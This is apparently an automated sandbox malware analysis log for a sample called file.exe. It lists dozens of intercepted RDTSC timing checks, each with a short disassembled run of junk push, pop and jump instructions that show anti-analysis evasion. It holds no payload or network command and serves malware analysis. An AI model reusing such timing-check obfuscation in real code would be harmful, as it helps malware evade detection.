                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD7B6 second address: BCD7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD94C second address: BCD951 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD951 second address: BCD968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C752FEh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD968 second address: BCD9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF624B4E808h 0x0000000e push edx 0x0000000f jnp 00007FF624B4E7D6h 0x00000015 pop edx 0x00000016 pushad 0x00000017 jmp 00007FF624B4E7E8h 0x0000001c jmp 00007FF624B4E7DAh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDACB second address: BCDADB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF624C752F6h 0x00000008 jns 00007FF624C752F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDADB second address: BCDAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF624B4E7DCh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDC63 second address: BCDC84 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF624C75307h 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDC84 second address: BCDC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE68D second address: BCE691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0E7F second address: BD0E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0E86 second address: BD0E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0E8C second address: BD0E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3FF89 second address: B3FF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD740D second address: BD743A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b ja 00007FF624B4E7D6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 jmp 00007FF624B4E7DFh 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FF624B4E7D6h 0x00000021 push eax 0x00000022 pop eax 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD743A second address: BD7440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD7598 second address: BD759C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD759C second address: BD75A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD75A2 second address: BD75AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007FF624B4E7D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD75AF second address: BD75CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75300h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF624C752F6h 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD75CC second address: BD75FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF624B4E7D6h 0x00000008 jmp 00007FF624B4E7DBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FF624B4E7DCh 0x00000019 je 00007FF624B4E7D6h 0x0000001f jc 00007FF624B4E7DEh 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD75FB second address: BD75FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD75FF second address: BD7606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD7E46 second address: BD7E52 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624C752F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD7E52 second address: BD7E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007FF624B4E7D6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jnl 00007FF624B4E7EAh 0x00000014 jmp 00007FF624B4E7E4h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD890C second address: BD895C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF624C75303h 0x0000000d jmp 00007FF624C752FAh 0x00000012 push eax 0x00000013 jmp 00007FF624C75305h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF624C75302h 0x00000020 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8C20 second address: BD8C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8C26 second address: BD8C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF624C752F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e jp 00007FF624C752F6h 0x00000014 jbe 00007FF624C752F6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d pushad 0x0000001e jnc 00007FF624C752F6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE105D second address: BE1068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE01DB second address: BE01DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE05A3 second address: BE05A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE05A7 second address: BE05B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF624C752F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE05B7 second address: BE05BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0746 second address: BE074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE074E second address: BE0754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0754 second address: BE075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE075F second address: BE0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0763 second address: BE0787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FF624C75307h 0x0000000e jmp 00007FF624C75301h 0x00000013 push eax 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE09F7 second address: BE09FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0BAD second address: BE0BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75305h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0D1C second address: BE0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0D20 second address: BE0D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF624C752FEh 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE68C4 second address: BE68CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE68CD second address: BE68D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE69FA second address: BE69FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE69FE second address: BE6A1B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C752FFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6A1B second address: BE6A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6CFC second address: BE6D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF624C75304h 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6EA0 second address: BE6EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6FF9 second address: BE7006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FF624C752F6h 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE7006 second address: BE700A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE746B second address: BE7482 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FF624C75301h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE7E9F second address: BE7EAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE857F second address: BE858D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C752FAh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE858D second address: BE8591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEF994 second address: BEF99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEF592 second address: BEF596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEF596 second address: BEF5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF624C75302h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEF5A4 second address: BEF5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF624B4E7D6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEF5AE second address: BEF5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB840 second address: BFB846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB846 second address: BFB84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB84A second address: BFB84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB84E second address: BFB854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB854 second address: BFB866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB866 second address: BFB86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB86A second address: BFB88C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 jmp 00007FF624B4E7DFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB88C second address: BFB890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB890 second address: BFB896 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD33C second address: BFD35A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C75309h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD35A second address: BFD37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624B4E7E7h 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD37B second address: BFD37F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B393E5 second address: B393EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD1D6 second address: BFD1E0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD1E0 second address: BFD1EC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF624B4E7DEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0131F second address: C01323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0678E second address: C06794 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D6F4 second address: B2D6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D6F8 second address: B2D712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D712 second address: B2D72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75305h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1C6C2 second address: C1C6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7DEh 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d ja 00007FF624B4E7D6h 0x00000013 jnl 00007FF624B4E7D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1AFF5 second address: C1B016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF624C75307h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B016 second address: C1B01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B01A second address: C1B01E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B01E second address: C1B02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B02A second address: C1B02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B02E second address: C1B068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF624B4E7DEh 0x0000000e jg 00007FF624B4E7D6h 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FF624B4E7E7h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B068 second address: C1B06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B1B7 second address: C1B1CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF624B4E7DBh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B1CD second address: C1B1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B59F second address: C1B5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B5A5 second address: C1B5C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF624C75302h 0x0000000c jmp 00007FF624C752FAh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B5C1 second address: C1B5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E8h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B5DD second address: C1B5F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B5F9 second address: C1B61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624B4E7D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e jnp 00007FF624B4E813h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF624B4E7DAh 0x0000001b jbe 00007FF624B4E7D6h 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B782 second address: C1B788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B788 second address: C1B791 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1C425 second address: C1C42B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1C42B second address: C1C42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2133C second address: C21347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C21347 second address: C21394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF624B4E7E9h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FF624B4E7DEh 0x00000012 jmp 00007FF624B4E7E7h 0x00000017 jg 00007FF624B4E7D6h 0x0000001d popad 0x0000001e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C21394 second address: C213A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FF624C752F6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C213A4 second address: C213A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
